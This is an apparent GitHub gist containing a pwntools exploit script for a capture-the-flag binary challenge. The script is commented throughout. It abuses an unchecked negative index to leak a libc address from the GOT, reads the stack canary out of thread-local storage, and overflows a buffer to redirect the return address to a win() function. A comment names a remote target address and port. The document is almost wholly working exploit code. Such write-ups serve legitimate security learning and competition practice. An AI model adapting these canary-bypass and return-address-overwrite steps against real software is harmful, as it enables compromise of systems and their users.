@c0nrad

c0nrad/solve.py Secret

Last active February 9, 2025 21:15
Show Gist options
  • Save c0nrad/8aa6300c6035ce640cb0497106eb3377 to your computer and use it in GitHub Desktop.
Save c0nrad/8aa6300c6035ce640cb0497106eb3377 to your computer and use it in GitHub Desktop.
# Judging by the flag text, the intended solution was to leak a stack address via libc.
# This script instead reads the stack canary out of TLS with the same out-of-bounds
# read primitive, then overwrites the saved return address with win().
import pwn

# Challenge binary.  Binding it to context.binary lets pwntools pick the
# arch/word size for every flat()/pack() call below.
pwn.context.binary = elf = pwn.ELF("./chall")
def sla(x: bytes | str, y: bytes | str) -> None:
    """Wait until the target has printed `x`, then send `y` plus a newline.

    Thin wrapper over the global tube `p`; the received data is discarded.
    """
    p.sendlineafter(x, y)
def rl() -> bytes:
    """Return the next line (newline included) from the global tube `p`."""
    line = p.recvline()
    return line
# The libc shipped with the challenge; its symbol offsets turn the leaked
# pointer into a base address.  Must be the exact build the target runs.
libc = pwn.ELF("./libc.so.6")

# Local process by default.  For the live target swap in:
#   p = pwn.remote("34.170.146.252", "20866")
p = elf.process()
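# ---- Leak libc ----
# Menu option 1 prints the 8-byte word at 0x404040 + 8*index and does not
# reject negative indexes, so it can read the GOT that sits below the array.
# 0x403ff0 is the GOT slot holding the resolved __libc_start_main pointer
# (that is the symbol subtracted below).
sla(">", "1")
sla("index: ", str((0x403ff0 - 0x404040) // 8))
# Mask to 64 bits in case the target prints the word with a signed format;
# a no-op when the value is printed unsigned.
libc_leak = int(rl().strip()) & 0xFFFFFFFFFFFFFFFF
libc.address = libc_leak - libc.symbols["__libc_start_main"]
# A wrong GOT slot or a mismatched libc build shows up here as an unaligned
# base; fail early instead of computing a garbage canary address from it.
if libc.address & 0xFFF:
    raise RuntimeError(
        f"libc base {libc.address:#x} is not page-aligned: bad leak or wrong libc.so.6"
    )
print(f"{libc.address = :#x}")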
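# ---- Leak canary ----
# On x86-64 glibc the stack canary is stored in the thread control block
# (fs:0x28), which lives in the TLS mapping placed at a fixed distance below
# libc.  The offset below was measured on one local run (fs:0x28 was at
# 0x70cdea756768 while libc was mapped at 0x70cdea759000).  It only holds
# while the remote ld.so/libc and mmap layout match the local ones; if the
# check below fires, re-measure the offset against the remote libc.
canary_addr = libc.address + (0x70cdea756768 - 0x70cdea759000)
print(f"{canary_addr = :#x}")
sla(">", "1")
sla("index: ", str((canary_addr - 0x404040) // 8))
# Mask to 64 bits: a canary with its top bit set would come back negative if
# the target prints with a signed format, and pack() would then reject it.
canary = int(rl().strip()) & 0xFFFFFFFFFFFFFFFF
# glibc canaries always have a zero low byte; anything else means the TLS
# offset is wrong for this target and the overwrite would only trigger
# __stack_chk_fail.
if canary & 0xFF:
    raise RuntimeError(
        f"leaked value {canary:#x} does not look like a canary: TLS offset is off"
    )
print(f"{canary = :#x}")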
# ---- Overwrite the return address ----
# Menu option 2 writes at index 0.  The offsets used here imply the written
# value runs past the buffer into the saved canary (+0x28), saved rbp
# (+0x30) and the return address (+0x38); flat() fills the bytes below 0x28
# with its default cyclic pattern.
sla(">", "2")
sla("index: ", str(0))
fake_rbp = elf.bss() + 0x400  # presumably a writable scratch frame for win()'s rbp-relative locals
win_addr = elf.symbols["win"]
# NOTE(review): win() is entered with the stack 16-byte misaligned.  If it
# calls system() and dies on a movaps, put a `ret` gadget at 0x38 and move
# win_addr to 0x40.
payload = pwn.flat({0x28: canary, 0x30: fake_rbp, 0x38: win_addr})
sla("value:", payload)
p.interactive()